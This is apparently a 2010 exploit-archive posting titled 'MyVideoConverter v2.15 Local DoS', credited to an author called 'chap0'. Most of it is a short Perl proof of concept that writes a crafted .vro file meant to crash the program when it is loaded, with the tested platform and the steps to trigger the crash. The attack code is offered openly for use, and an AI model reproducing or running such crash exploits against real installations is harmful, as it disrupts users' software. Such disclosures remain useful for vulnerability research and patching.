MyVideoConverter v2.15 Local DoS
Posted on 05 April 2010
================================ MyVideoConverter v2.15 Local DoS ================================ # Exploit Title: MyVideoConverter Local DoS # Date: April 5, 2010 # Software Link: [http://www.ivideogo.com/] # Version: 2.15 # Tested on: Windows XP SP3 # Author: chap0 # Email: chap0x90[at]gmail[dot]com # #!/usr/bin/perl my $file = "hmm.vro"; my $null = "x00"; open (FILE, ">$file"); print FILE "$null"; print "Done. . . Add file -> click Start. " # Inj3ct0r.com [2010-04-05]